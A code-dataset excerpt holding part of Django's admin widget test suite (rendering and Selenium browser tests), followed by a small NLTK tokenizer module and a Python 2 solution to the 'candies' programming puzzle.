'<input type="text" name="test" class="vForeignKeyRawIdAdminField">\n'
'<a href="/admin_widgets/band/?name=%22%26%3E%3Cescapeme&_to_field=artist_ptr" '
'class="related-lookup" id="lookup_id_test" title="Lookup"></a>'
)
def test_render_fk_as_pk_model(self):
rel = VideoStream._meta.get_field('release_event').remote_field
w = widgets.ForeignKeyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('test', None),
'<input type="text" name="test" class="vForeignKeyRawIdAdminField">\n'
'<a href="/admin_widgets/releaseevent/?_to_field=album" '
'class="related-lookup" id="lookup_id_test" title="Lookup"></a>'
)
@override_settings(ROOT_URLCONF='admin_widgets.urls')
class ManyToManyRawIdWidgetTest(TestCase):
def test_render(self):
band = Band.objects.create(name='Linkin Park')
m1 = Member.objects.create(name='Chester')
m2 = Member.objects.create(name='Mike')
band.members.add(m1, m2)
rel = Band._meta.get_field('members').remote_field
w = widgets.ManyToManyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('test', [m1.pk, m2.pk], attrs={}), (
'<input type="text" name="test" value="%(m1pk)s,%(m2pk)s" class="vManyToManyRawIdAdminField">'
'<a href="/admin_widgets/member/" class="related-lookup" id="lookup_id_test" title="Lookup"></a>'
) % {'m1pk': m1.pk, 'm2pk': m2.pk}
)
self.assertHTMLEqual(
w.render('test', [m1.pk]), (
'<input type="text" name="test" value="%(m1pk)s" class="vManyToManyRawIdAdminField">'
'<a href="/admin_widgets/member/" class="related-lookup" id="lookup_id_test" title="Lookup"></a>'
) % {'m1pk': m1.pk}
)
def test_m2m_related_model_not_in_admin(self):
# M2M relationship with model not registered with admin site. Raw ID
# widget should have no magnifying glass link. See #16542
consultor1 = Advisor.objects.create(name='Rockstar Techie')
c1 = Company.objects.create(name='Doodle')
c2 = Company.objects.create(name='Pear')
consultor1.companies.add(c1, c2)
rel = Advisor._meta.get_field('companies').remote_field
w = widgets.ManyToManyRawIdWidget(rel, widget_admin_site)
self.assertHTMLEqual(
w.render('company_widget1', [c1.pk, c2.pk], attrs={}),
'<input type="text" name="company_widget1" value="%(c1pk)s,%(c2pk)s">' % {'c1pk': c1.pk, 'c2pk': c2.pk}
)
self.assertHTMLEqual(
w.render('company_widget2', [c1.pk]),
'<input type="text" name="company_widget2" value="%(c1pk)s">' % {'c1pk': c1.pk}
)
@override_settings(ROOT_URLCONF='admin_widgets.urls')
class RelatedFieldWidgetWrapperTests(SimpleTestCase):
def test_no_can_add_related(self):
rel = Individual._meta.get_field('parent').remote_field
w = widgets.AdminRadioSelect()
# Used to fail with a name error.
w = widgets.RelatedFieldWidgetWrapper(w, rel, widget_admin_site)
self.assertFalse(w.can_add_related)
def test_select_multiple_widget_cant_change_delete_related(self):
rel = Individual._meta.get_field('parent').remote_field
widget = forms.SelectMultiple()
wrapper = widgets.RelatedFieldWidgetWrapper(
widget, rel, widget_admin_site,
can_add_related=True,
can_change_related=True,
can_delete_related=True,
)
self.assertTrue(wrapper.can_add_related)
self.assertFalse(wrapper.can_change_related)
self.assertFalse(wrapper.can_delete_related)
def test_on_delete_cascade_rel_cant_delete_related(self):
rel = Individual._meta.get_field('soulmate').remote_field
widget = forms.Select()
wrapper = widgets.RelatedFieldWidgetWrapper(
widget, rel, widget_admin_site,
can_add_related=True,
can_change_related=True,
can_delete_related=True,
)
self.assertTrue(wrapper.can_add_related)
self.assertTrue(wrapper.can_change_related)
self.assertFalse(wrapper.can_delete_related)
def test_custom_widget_render(self):
class CustomWidget(forms.Select):
def render(self, *args, **kwargs):
return 'custom render output'
rel = Album._meta.get_field('band').remote_field
widget = CustomWidget()
wrapper = widgets.RelatedFieldWidgetWrapper(
widget, rel, widget_admin_site,
can_add_related=True,
can_change_related=True,
can_delete_related=True,
)
output = wrapper.render('name', 'value')
self.assertIn('custom render output', output)
def test_widget_delegates_value_omitted_from_data(self):
class CustomWidget(forms.Select):
def value_omitted_from_data(self, data, files, name):
return False
rel = Album._meta.get_field('band').remote_field
widget = CustomWidget()
wrapper = widgets.RelatedFieldWidgetWrapper(widget, rel, widget_admin_site)
self.assertIs(wrapper.value_omitted_from_data({}, {}, 'band'), False)
def test_widget_is_hidden(self):
rel = Album._meta.get_field('band').remote_field
widget = forms.HiddenInput()
widget.choices = ()
wrapper = widgets.RelatedFieldWidgetWrapper(widget, rel, widget_admin_site)
self.assertIs(wrapper.is_hidden, True)
context = wrapper.get_context('band', None, {})
self.assertIs(context['is_hidden'], True)
output = wrapper.render('name', 'value')
# Related item links are hidden.
self.assertNotIn('<a ', output)
def test_widget_is_not_hidden(self):
rel = Album._meta.get_field('band').remote_field
widget = forms.Select()
wrapper = widgets.RelatedFieldWidgetWrapper(widget, rel, widget_admin_site)
self.assertIs(wrapper.is_hidden, False)
context = wrapper.get_context('band', None, {})
self.assertIs(context['is_hidden'], False)
output = wrapper.render('name', 'value')
# Related item links are present.
self.assertIn('<a ', output)
@override_settings(ROOT_URLCONF='admin_widgets.urls')
class AdminWidgetSeleniumTestCase(AdminSeleniumTestCase):
available_apps = ['admin_widgets'] + AdminSeleniumTestCase.available_apps
def setUp(self):
self.u1 = User.objects.create_superuser(username='super', password='secret', email='super@example.com')
class DateTimePickerSeleniumTests(AdminWidgetSeleniumTestCase):
def test_show_hide_date_time_picker_widgets(self):
"""
Pressing the ESC key or clicking on a widget value closes the date and
time picker widgets.
"""
from selenium.webdriver.common.keys import Keys
self.admin_login(username='super', password='secret', login_url='/')
# Open a page that has a date and time picker widgets
self.selenium.get(self.live_server_url + reverse('admin:admin_widgets_member_add'))
# First, with the date picker widget ---------------------------------
cal_icon = self.selenium.find_element_by_id('calendarlink0')
# The date picker is hidden
self.assertFalse(self.selenium.find_element_by_id('calendarbox0').is_displayed())
# Click the calendar icon
cal_icon.click()
# The date picker is visible
self.assertTrue(self.selenium.find_element_by_id('calendarbox0').is_displayed())
# Press the ESC key
self.selenium.find_element_by_tag_name('body').send_keys([Keys.ESCAPE])
# The date picker is hidden again
self.assertFalse(self.selenium.find_element_by_id('calendarbox0').is_displayed())
# Click the calendar icon, then on the 15th of current month
cal_icon.click()
self.selenium.find_element_by_xpath("//a[contains(text(), '15')]").click()
self.assertFalse(self.selenium.find_element_by_id('calendarbox0').is_displayed())
self.assertEqual(
self.selenium.find_element_by_id('id_birthdate_0').get_attribute('value'),
datetime.today().strftime('%Y-%m-') + '15',
)
# Then, with the time picker widget ----------------------------------
time_icon = self.selenium.find_element_by_id('clocklink0')
# The time picker is hidden
self.assertFalse(self.selenium.find_element_by_id('clockbox0').is_displayed())
# Click the time icon
time_icon.click()
# The time picker is visible
self.assertTrue(self.selenium.find_element_by_id('clockbox0').is_displayed())
self.assertEqual(
[
x.text for x in
self.selenium.find_elements_by_xpath("//ul[@class='timelist']/li/a")
],
['Now', 'Midnight', '6 a.m.', 'Noon', '6 p.m.']
)
# Press the ESC key
self.selenium.find_element_by_tag_name('body').send_keys([Keys.ESCAPE])
# The time picker is hidden again
self.assertFalse(self.selenium.find_element_by_id('clockbox0').is_displayed())
# Click the time icon, then select the 'Noon' value
time_icon.click()
self.selenium.find_element_by_xpath("//a[contains(text(), 'Noon')]").click()
self.assertFalse(self.selenium.find_element_by_id('clockbox0').is_displayed())
self.assertEqual(
self.selenium.find_element_by_id('id_birthdate_1').get_attribute('value'),
'12:00:00',
)
def test_calendar_nonday_class(self):
"""
Ensure cells that are not days of the month have the `nonday` CSS class.
Refs #4574.
"""
self.admin_login(username='super', password='secret', login_url='/')
# Open a page that has a date and time picker widgets
self.selenium.get(self.live_server_url + reverse('admin:admin_widgets_member_add'))
# fill in the birth date.
self.selenium.find_element_by_id('id_birthdate_0').send_keys('2013-06-01')
# Click the calendar icon
self.selenium.find_element_by_id('calendarlink0').click()
# get all the tds within the calendar
calendar0 = self.selenium.find_element_by_id('calendarin0')
tds = calendar0.find_elements_by_tag_name('td')
# make sure the first and last 6 cells have class nonday
for td in tds[:6] + tds[-6:]:
self.assertEqual(td.get_attribute('class'), 'nonday')
def test_calendar_selected_class(self):
"""
Ensure cell for the day in the input has the `selected` CSS class.
Refs #4574.
"""
self.admin_login(username='super', password='secret', login_url='/')
# Open a page that has a date and time picker widgets
self.selenium.get(self.live_server_url + reverse('admin:admin_widgets_member_add'))
# fill in the birth date.
self.selenium.find_element_by_id('id_birthdate_0').send_keys('2013-06-01')
# Click the calendar icon
self.selenium.find_element_by_id('calendarlink0').click()
# get all the tds within the calendar
calendar0 = self.selenium.find_element_by_id('calendarin0')
tds = calendar0.find_elements_by_tag_name('td')
# verify the selected cell
selected = tds[6]
self.assertEqual(selected.get_attribute('class'), 'selected')
self.assertEqual(selected.text, '1')
def test_calendar_no_selected_class(self):
"""
Ensure no cells are given the selected class when the field is empty.
Refs #4574.
"""
self.admin_login(username='super', password='secret', login_url='/')
# Open a page that has a date and time picker widgets
self.selenium.get(self.live_server_url + reverse('admin:admin_widgets_member_add'))
# Click the calendar icon
self.selenium.find_element_by_id('calendarlink0').click()
# get all the tds within the calendar
calendar0 = self.selenium.find_element_by_id('calendarin0')
tds = calendar0.find_elements_by_tag_name('td')
# verify there are no cells with the selected class
selected = [td for td in tds if td.get_attribute('class') == 'selected']
self.assertEqual(len(selected), 0)
def test_calendar_show_date_from_input(self):
"""
The calendar shows the date from the input field for every locale
supported by Django.
"""
self.selenium.set_window_size(1024, 768)
self.admin_login(username='super', password='secret', login_url='/')
# Enter test data
member = Member.objects.create(name='Bob', birthdate=datetime(1984, 5, 15), gender='M')
# Get month name translations for every locale
month_string = 'May'
path = os.path.join(os.path.dirname(import_module('django.contrib.admin').__file__), 'locale')
for language_code, language_name in settings.LANGUAGES:
try:
catalog = gettext.translation('djangojs', path, [language_code])
except OSError:
continue
if month_string in catalog._catalog:
month_name = catalog._catalog[month_string]
else:
month_name = month_string
# Get the expected caption
may_translation = month_name
expected_caption = '{:s} {:d}'.format(may_translation.upper(), 1984)
# Test with every locale
with override_settings(LANGUAGE_CODE=language_code):
# Open a page that has a date picker widget
url = reverse('admin:admin_widgets_member_change', args=(member.pk,))
self.selenium.get(self.live_server_url + url)
# Click on the calendar icon
self.selenium.find_element_by_id('calendarlink0').click()
# Make sure that the right month and year are displayed
self.wait_for_text('#calendarin0 caption', expected_caption)
@override_settings(TIME_ZONE='Asia/Singapore')
class DateTimePickerShortcutsSeleniumTests(AdminWidgetSeleniumTestCase):
def test_date_time_picker_shortcuts(self):
"""
date/time/datetime picker shortcuts work in the current time zone.
Refs #20663.
This test case is fairly tricky, it relies on selenium still running the browser
in the default time zone "America/Chicago" despite `override_settings` changing
the time zone to "Asia/Singapore".
"""
self.admin_login(username='super', password='secret', login_url='/')
error_margin = timedelta(seconds=10)
# If we are near a DST transition, we add an hour of error margin.
tz = pytz.timezone('America/Chicago')
utc_now = datetime.now(pytz.utc)
tz_yesterday = (utc_now - timedelta(days=1)).astimezone(tz).tzname()
tz_tomorrow = (utc_now + timedelta(days=1)).astimezone(tz).tzname()
if tz_yesterday != tz_tomorrow:
error_margin += timedelta(hours=1)
self.selenium.get(self.live_server_url + reverse('admin:admin_widgets_member_add'))
self.selenium.find_element_by_id('id_name').send_keys('test')
# Click on the "today" and "now" shortcuts.
shortcuts = self.selenium.find_elements_by_css_selector('.field-birthdate .datetimeshortcuts')
now = datetime.now()
for shortcut in shortcuts:
shortcut.find_element_by_tag_name('a').click()
# There is a time zone mismatch warning.
# Warning: This would effectively fail if the TIME_ZONE defined in the
# settings has the same UTC offset as "Asia/Singapore" because the
# mismatch warning would be rightfully missing from the page.
self.selenium.find_elements_by_css_selector('.field-birthdate .timezonewarning')
# Submit the form.
with self.wait_page_loaded():
self.selenium.find_element_by_name('_save').click()
# Make sure that "now" in JavaScript is within 10 seconds
# from "now" on the server side.
member = Member.objects.get(name='test')
self.assertGreater(member.birthdate, now - error_margin)
self.assertLess(member.birthdate, now + error_margin)
# The above tests run with Asia/Singapore, which is on the positive side of
# UTC. Here we test with a timezone on the negative side.
@override_settings(TIME_ZONE='US/Eastern')
class DateTimePickerAltTimezoneSeleniumTests(DateTimePickerShortcutsSeleniumTests):
pass
class HorizontalVerticalFilterSeleniumTests(AdminWidgetSeleniumTestCase):
def setUp(self):
super().setUp()
self.lisa = Student.objects.create(name='Lisa')
self.john = Student.objects.create(name='John')
self.bob = Student.objects.create(name='Bob')
self.peter = Student.objects.create(name='Peter')
self.jenny = Student.objects.create(name='Jenny')
self.jason = Student.objects.create(name='Jason')
self.cliff = Student.objects.create(name='Cliff')
self.arthur = Student.objects.create(name='Arthur')
self.school = School.objects.create(name='School of Awesome')
def assertActiveButtons(self, mode, field_name, choose, remove, choose_all=None, remove_all=None):
choose_link = '#id_%s_add_link' % field_name
choose_all_link = '#id_%s_add_all_link' % field_name
remove_link = '#id_%s_remove_link' % field_name
remove_all_link = '#id_%s_remove_all_link' % field_name
self.assertEqual(self.has_css_class(choose_link, 'active'), choose)
self.assertEqual(self.has_css_class(remove_link, 'active'), remove)
if mode == 'horizontal':
self.assertEqual(self.has_css_class(choose_all_link, 'active'), choose_all)
self.assertEqual(self.has_css_class(remove_all_link, 'active'), remove_all)
def execute_basic_operations(self, mode, field_name):
original_url = self.selenium.current_url
from_box = '#id_%s_from' % field_name
to_box = '#id_%s_to' % field_name
choose_link = 'id_%s_add_link' % field_name
choose_all_link = 'id_%s_add_all_link' % field_name
remove_link = 'id_%s_remove_link' % field_name
remove_all_link = 'id_%s_remove_all_link' % field_name
# Initial positions ---------------------------------------------------
self.assertSelectOptions(from_box, [
str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jason.id),
str(self.jenny.id), str(self.john.id),
])
self.assertSelectOptions(to_box, [str(self.lisa.id), str(self.peter.id)])
self.assertActiveButtons(mode, field_name, False, False, True, True)
# Click 'Choose all' --------------------------------------------------
if mode == 'horizontal':
self.selenium.find_element_by_id(choose_all_link).click()
elif mode == 'vertical':
# There's no 'Choose all' button in vertical mode, so individually
# select all options and click 'Choose'.
for option in self.selenium.find_elements_by_css_selector(from_box + ' > option'):
option.click()
self.selenium.find_element_by_id(choose_link).click()
self.assertSelectOptions(from_box, [])
self.assertSelectOptions(to_box, [
str(self.lisa.id), str(self.peter.id),
str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jason.id),
str(self.jenny.id), str(self.john.id),
])
self.assertActiveButtons(mode, field_name, False, False, False, True)
# Click 'Remove all' --------------------------------------------------
if mode == 'horizontal':
self.selenium.find_element_by_id(remove_all_link).click()
elif mode == 'vertical':
# There's no 'Remove all' button in vertical mode, so individually
# select all options and click 'Remove'.
for option in self.selenium.find_elements_by_css_selector(to_box + ' > option'):
option.click()
self.selenium.find_element_by_id(remove_link).click()
self.assertSelectOptions(from_box, [
str(self.lisa.id), str(self.peter.id),
str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jason.id),
str(self.jenny.id), str(self.john.id),
])
self.assertSelectOptions(to_box, [])
self.assertActiveButtons(mode, field_name, False, False, True, False)
# Choose some options ------------------------------------------------
from_lisa_select_option = self.selenium.find_element_by_css_selector(
'{} > option[value="{}"]'.format(from_box, self.lisa.id)
)
# Check the title attribute is there for tool tips: ticket #20821
self.assertEqual(from_lisa_select_option.get_attribute('title'), from_lisa_select_option.get_attribute('text'))
self.select_option(from_box, str(self.lisa.id))
self.select_option(from_box, str(self.jason.id))
self.select_option(from_box, str(self.bob.id))
self.select_option(from_box, str(self.john.id))
self.assertActiveButtons(mode, field_name, True, False, True, False)
self.selenium.find_element_by_id(choose_link).click()
self.assertActiveButtons(mode, field_name, False, False, True, True)
self.assertSelectOptions(from_box, [
str(self.peter.id), str(self.arthur.id),
str(self.cliff.id), str(self.jenny.id),
])
self.assertSelectOptions(to_box, [
str(self.lisa.id), str(self.bob.id),
str(self.jason.id), str(self.john.id),
])
# Check the tooltip is still there after moving: ticket #20821
to_lisa_select_option = self.selenium.find_element_by_css_selector(
'{} > option[value="{}"]'.format(to_box, self.lisa.id)
)
self.assertEqual(to_lisa_select_option.get_attribute('title'), to_lisa_select_option.get_attribute('text'))
# Remove some options -------------------------------------------------
self.select_option(to_box, str(self.lisa.id))
self.select_option(to_box, str(self.bob.id))
self.assertActiveButtons(mode, field_name, False, True, True, True)
self.selenium.find_element_by_id(remove_link).click()
self.assertActiveButtons(mode, field_name, False, False, True, True)
self.assertSelectOptions(from_box, [
str(self.peter.id), str(self.arthur.id),
str(self.cliff.id), str(self.jenny.id),
str(self.lisa.id), str(self.bob.id)
])
self.assertSelectOptions(to_box, [str(self.jason.id), str(self.john.id)])
# Choose some more options --------------------------------------------
self.select_option(from_box, str(self.arthur.id))
self.select_option(from_box, str(self.cliff.id))
self.selenium.find_element_by_id(choose_link).click()
self.assertSelectOptions(from_box, [
str(self.peter.id), str(self.jenny.id),
str(self.lisa.id), str(self.bob.id),
])
self.assertSelectOptions(to_box, [
str(self.jason.id), str(self.john.id),
str(self.arthur.id), str(self.cliff.id),
])
# Choose some more options --------------------------------------------
self.select_option(from_box, str(self.peter.id))
self.select_option(from_box, str(self.lisa.id))
# Confirm they're selected after clicking inactive buttons: ticket #26575
self.assertSelectedOptions(from_box, [str(self.peter.id), str(self.lisa.id)])
self.selenium.find_element_by_id(remove_link).click()
self.assertSelectedOptions(from_box, [str(self.peter.id), str(self.lisa.id)])
# Unselect the options ------------------------------------------------
self.deselect_option(from_box, str(self.peter.id))
self.deselect_option(from_box, str(self.lisa.id))
# Choose some more options --------------------------------------------
self.select_option(to_box, str(self.jason.id))
self.select_option(to_box, str(self.john.id))
# Confirm they're selected after clicking inactive buttons: ticket #26575
self.assertSelectedOptions(to_box, [str(self.jason.id), str(self.john.id)])
self.selenium.find_element_by_id(choose_link).click()
self.assertSelectedOptions(to_box, [str(self.jason.id), str(self.john.id)])
# Unselect the options ------------------------------------------------
self.deselect_option(to_box, str(self.jason.id))
self.deselect_option(to_box, str(self.john.id))
# Pressing buttons shouldn't change the URL.
self.assertEqual(self.selenium.current_url, original_url)
def test_basic(self):
self.selenium.set_window_size(1024, 768)
self.school.students.set([self.lisa, self.peter])
self.school.alumni.set([self.lisa, self.peter])
self.admin_login(username='super', password='secret', login_url='/')
self.selenium.get(self.live_server_url + reverse('admin:admin_widgets_school_change', args=(self.school.id,)))
self.wait_page_ready()
self.execute_basic_operations('vertical', 'students')
self.execute_basic_operations('horizontal', 'alumni')
# Save and check that everything is properly stored in the database ---
self.selenium.find_element_by_xpath('//input[@value="Save"]').click()
self.wait_page_ready()
self.school = School.objects.get(id=self.school.id) # Reload from database
self.assertEqual(list(self.school.students.all()), [self.arthur, self.cliff, self.jason, self.john])
self.assertEqual(list(self.school.alumni.all()), [self.arthur, self.cliff, self.jason, self.john])
def test_filter(self):
"""
Typing in the search box filters out options displayed in the 'from'
box.
"""
from selenium.webdriver.common.keys import Keys
self.selenium.set_window_size(1024, 768)
self.school.students.set([self.lisa, self.peter])
self.school.alumni.set([self.lisa, self.peter])
self.admin_login(username='super', password='secret', login_url='/')
self.selenium.get(self.live_server_url + reverse('admin:admin_widgets_school_change', args=(self.school.id,)))
for field_name in ['students', 'alumni']:
from_box = '#id_%s_from' % field_name
to_box = '#id_%s_to' % field_name
choose_link = 'id_%s_add_link' % field_name
remove_link = 'id_%s_remove_link' % field_name
input = self.selenium.find_element_by_id('id_%s_input' % field_name)
# Initial values
self.assertSelectOptions(from_box, [
str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jason.id),
str(self.jenny.id), str(self.john.id),
])
# Typing in some characters filters out non-matching options
input.send_keys('a')
self.assertSelectOptions(from_box, [str(self.arthur.id), str(self.jason.id)])
input.send_keys('R')
self.assertSelectOptions(from_box, [str(self.arthur.id)])
# Clearing the text box makes the other options reappear
input.send_keys([Keys.BACK_SPACE])
self.assertSelectOptions(from_box, [str(self.arthur.id), str(self.jason.id)])
input.send_keys([Keys.BACK_SPACE])
self.assertSelectOptions(from_box, [
str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jason.id),
str(self.jenny.id), str(self.john.id),
])
# -----------------------------------------------------------------
# Choosing a filtered option sends it properly to the 'to' box.
input.send_keys('a')
self.assertSelectOptions(from_box, [str(self.arthur.id), str(self.jason.id)])
self.select_option(from_box, str(self.jason.id))
self.selenium.find_element_by_id(choose_link).click()
self.assertSelectOptions(from_box, [str(self.arthur.id)])
self.assertSelectOptions(to_box, [
str(self.lisa.id), str(self.peter.id), str(self.jason.id),
])
self.select_option(to_box, str(self.lisa.id))
self.selenium.find_element_by_id(remove_link).click()
self.assertSelectOptions(from_box, [str(self.arthur.id), str(self.lisa.id)])
self.assertSelectOptions(to_box, [str(self.peter.id), str(self.jason.id)])
input.send_keys([Keys.BACK_SPACE]) # Clear text box
self.assertSelectOptions(from_box, [
str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jenny.id),
str(self.john.id), str(self.lisa.id),
])
self.assertSelectOptions(to_box, [str(self.peter.id), str(self.jason.id)])
# -----------------------------------------------------------------
# Pressing enter on a filtered option sends it properly to
# the 'to' box.
self.select_option(to_box, str(self.jason.id))
self.selenium.find_element_by_id(remove_link).click()
input.send_keys('ja')
self.assertSelectOptions(from_box, [str(self.jason.id)])
input.send_keys([Keys.ENTER])
self.assertSelectOptions(to_box, [str(self.peter.id), str(self.jason.id)])
input.send_keys([Keys.BACK_SPACE, Keys.BACK_SPACE])
# Save and check that everything is properly stored in the database ---
with self.wait_page_loaded():
self.selenium.find_element_by_xpath('//input[@value="Save"]').click()
self.school = School.objects.get(id=self.school.id) # Reload from database
self.assertEqual(list(self.school.students.all()), [self.jason, self.peter])
self.assertEqual(list(self.school.alumni.all()), [self.jason, self.peter])
def test_back_button_bug(self):
"""
Some browsers had a bug where navigating away from the change page
and then clicking the browser's back button would clear the
filter_horizontal/filter_vertical widgets (#13614).
"""
self.school.students.set([self.lisa, self.peter])
self.school.alumni.set([self.lisa, self.peter])
self.admin_login(username='super', password='secret', login_url='/')
change_url = reverse('admin:admin_widgets_school_change', args=(self.school.id,))
self.selenium.get(self.live_server_url + change_url)
# Navigate away and go back to the change form page.
self.selenium.find_element_by_link_text('Home').click()
self.selenium.back()
expected_unselected_values = [
str(self.arthur.id), str(self.bob.id), str(self.cliff.id),
str(self.jason.id), str(self.jenny.id), str(self.john.id),
]
expected_selected_values = [str(self.lisa.id), str(self.peter.id)]
# Everything is still in place
self.assertSelectOptions('#id_students_from', expected_unselected_values)
self.assertSelectOptions('#id_students_to', expected_selected_values)
self.assertSelectOptions('#id_alumni_from', expected_unselected_values)
self.assertSelectOptions('#id_alumni_to', expected_selected_values)
def test_refresh_page(self):
"""
Horizontal and vertical filter widgets keep selected options on page
reload (#22955).
"""
self.school.students.add(self.arthur, self.jason)
self.school.alumni.add(self.arthur, self.jason)
self.admin_login(username='super', password='secret', login_url='/')
change_url = reverse('admin:admin_widgets_school_change', args=(self.school.id,))
self.selenium.get(self.live_server_url + change_url)
options_len = len(self.selenium.find_elements_by_css_selector('#id_students_to > option'))
self.assertEqual(options_len, 2)
# self.selenium.refresh() or send_keys(Keys.F5) does hard reload and
# doesn't replicate what happens when a user clicks the browser's
# 'Refresh' button.
with self.wait_page_loaded():
self.selenium.execute_script("location.reload()")
options_len = len(self.selenium.find_elements_by_css_selector('#id_students_to > option'))
self.assertEqual(options_len, 2)
class AdminRawIdWidgetSeleniumTests(AdminWidgetSeleniumTestCase):
def setUp(self):
super().setUp()
Band.objects.create(id=42, name='Bogey Blues')
Band.objects.create(id=98, name='Green Potatoes')
def test_ForeignKey(self):
self.admin_login(username='super', password='secret', login_url='/')
self.selenium.get(self.live_server_url + reverse('admin:admin_widgets_event_add'))
main_window = self.selenium.current_window_handle
# No value has been selected yet
self.assertEqual(self.selenium.find_element_by_id('id_main_band').get_attribute('value'), '')
# Open the popup window and click on a band
self.selenium.find_element_by_id('lookup_id_main_band').click()
self.wait_for_and_switch_to_popup()
link = self.selenium.find_element_by_link_text('Bogey Blues')
self.assertIn('/band/42/', link.get_attribute('href'))
link.click()
# The field now contains the selected band's id
self.selenium.switch_to.window(main_window)
self.wait_for_value('#id_main_band', '42')
# Reopen the popup window and click on another band
self.selenium.find_element_by_id('lookup_id_main_band').click()
self.wait_for_and_switch_to_popup()
link = self.selenium.find_element_by_link_text('Green Potatoes')
self.assertIn('/band/98/', link.get_attribute('href'))
link.click()
# The field now contains the other selected band's id
self.selenium.switch_to.window(main_window)
self.wait_for_value('#id_main_band', '98')
def test_many_to_many(self):
self.admin_login(username='super', password='secret', login_url='/')
self.selenium.get(self.live_server_url + reverse('admin:admin_widgets_event_add'))
main_window = self.selenium.current_window_handle
# No value has been selected yet
self.assertEqual(self.selenium.find_element_by_id('id_supporting_bands').get_attribute('value'), '')
# Help text for the field is displayed
self.assertEqual(
self.selenium.find_element_by_css_selector('.field-supporting_bands div.help').text,
'Supporting Bands.'
)
# Open the popup window and click on a band
self.selenium.find_element_by_id('lookup_id_supporting_bands').click()
self.wait_for_and_switch_to_popup()
link = self.selenium.find_element_by_link_text('Bogey Blues')
self.assertIn('/band/42/', link.get_attribute('href'))
link.click()
# The field now contains the selected band's id
self.selenium.switch_to.window(main_window)
self.wait_for_value('#id_supporting_bands', '42')
# Reopen the popup window and click on another band
self.selenium.find_element_by_id('lookup_id_supporting_bands').click()
self.wait_for_and_switch_to_popup()
link = self.selenium.find_element_by_link_text('Green Potatoes')
self.assertIn('/band/98/', link.get_attribute('href'))
link.click()
# The field now contains the two selected bands' ids
self.selenium.switch_to.window(main_window)
self.wait_for_value('#id_supporting_bands', '42,98')
class RelatedFieldWidgetSeleniumTests(AdminWidgetSeleniumTestCase):
def test_ForeignKey_using_to_field(self):
self.admin_login(username='super', password='secret', login_url='/')
self.selenium.get(self.live_server_url + reverse('admin:admin_widgets_profile_add'))
main_window = self.selenium.current_window_handle
# Click the Add User button to add a new user
self.selenium.find_element_by_id('add_id_user').click()
self.wait_for_and_switch_to_popup()
password_field = self.selenium.find_element_by_id('id_password')
password_field.send_keys('password')
username_field = self.selenium.find_element_by_id('id_username')
username_value = 'newuser'
username_field.send_keys(username_value)
save_button_css_selector = '.submit-row > input[type=submit]'
self.selenium.find_element_by_css_selector(save_button_css_selector).click()
self.selenium.switch_to.window(main_window)
# The field now contains the new user
self.selenium.find_element_by_css_selector('#id_user option[value=newuser]')
# Click the Change User button to change it
self.selenium.find_element_by_id('change_id_user').click()
self.wait_for_and_switch_to_popup()
username_field = self.selenium.find_element_by_id('id_username')
username_value = 'changednewuser'
username_field.clear()
username_field.send_keys(username_value)
save_button_css_selector = '.submit-row > input[type=submit]'
self.selenium.find_element_by_css_selector(save_button_css_selector).click()
self.selenium.switch_to.window(main_window)
self.selenium.find_element_by_css_selector('#id_user option[value=changednewuser]')
# Go ahead and submit the form to make sure it works
self.selenium.find_element_by_css_selector(save_button_css_selector).click()
self.wait_for_text('li.success', 'The profile “changednewuser” was added successfully.')
profiles = Profile.objects.all()
self.assertEqual(len(profiles), 1)
self.assertEqual(profiles[0].user.username, username_value)
| 44.491047
| 119
| 0.638798
|
908056ff88fedb13a85bf77ab30de842eda559fd
| 555
|
py
|
Python
|
tokenizer.py
|
jgprogramming/article-summarization
|
948197dc6038783947479cd51203d407c66dfe6f
|
[
"MIT"
] | null | null | null |
tokenizer.py
|
jgprogramming/article-summarization
|
948197dc6038783947479cd51203d407c66dfe6f
|
[
"MIT"
] | null | null | null |
tokenizer.py
|
jgprogramming/article-summarization
|
948197dc6038783947479cd51203d407c66dfe6f
|
[
"MIT"
] | null | null | null |
import nltk
from nltk.stem.lancaster import LancasterStemmer
stemmer = LancasterStemmer()
def stem_tokens(tokens):
stemmed = []
for item in tokens:
stemmed.append(stemmer.stem(item))
return stemmed
def tokenize(text):
tokens = nltk.word_tokenize(text)
stems = stem_tokens(tokens)
stems = [word.lower() for word in stems if word.isalpha()]
return stems
def tokenize_sent(text, title):
tCopy = text
if tCopy.startswith(title):
tCopy = tCopy[len(title):]
return nltk.sent_tokenize(tCopy.lstrip())
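# Illustrative usage only (not part of the original module): a minimal sketch
# showing how tokenize() and tokenize_sent() might be called. The sample title
# and text below are invented for illustration, and nltk's 'punkt' tokenizer
# data is assumed to be available (e.g. via nltk.download('punkt')).
if __name__ == '__main__':
    sample_title = 'A Short Article'
    sample_text = 'A Short Article. Stemming reduces words to their roots. It helps matching.'
    print(tokenize(sample_text))                     # stemmed, lowercased alphabetic tokens
    print(tokenize_sent(sample_text, sample_title))  # sentences with the leading title stripped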
| 24.130435
| 62
| 0.69009
|
64174df3f745b290adadde3c335a9ea968f103e6
| 464
|
py
|
Python
|
Python2/candies.py
|
LaughDonor/hackerrank
|
07fc0e596b2b456aa72a3cd66036d718253777f0
|
[
"Apache-2.0"
] | null | null | null |
Python2/candies.py
|
LaughDonor/hackerrank
|
07fc0e596b2b456aa72a3cd66036d718253777f0
|
[
"Apache-2.0"
] | null | null | null |
Python2/candies.py
|
LaughDonor/hackerrank
|
07fc0e596b2b456aa72a3cd66036d718253777f0
|
[
"Apache-2.0"
] | null | null | null |
__author__, N = "LaughDonor", input()
candy, ratings = [1] * (N + 1), [input() for x in xrange(N)] + [0]
for i, c in enumerate(candy[1:N], 1):
left, mid, right = ratings[i - 1:i + 2]
if left < mid:
c = candy[i - 1] + 1
elif left > mid:
j = i
while j > 0 and ratings[j - 1] > ratings[j]:
candy[j - 1] = max(candy[j - 1], candy[j] + 1)
j -= 1
else:
c = 1
candy[i] = c
print sum(candy) - 1
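# Worked example (comment only, not executed; added for illustration): for
# N = 3 and ratings 1, 2, 2 the loop assigns candy = [1, 2, 1] plus the
# sentinel slot, so the program prints 4 -- every child gets at least one
# candy and the second child, rated higher than the first, gets one extra.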
| 27.294118
| 66
| 0.469828
|
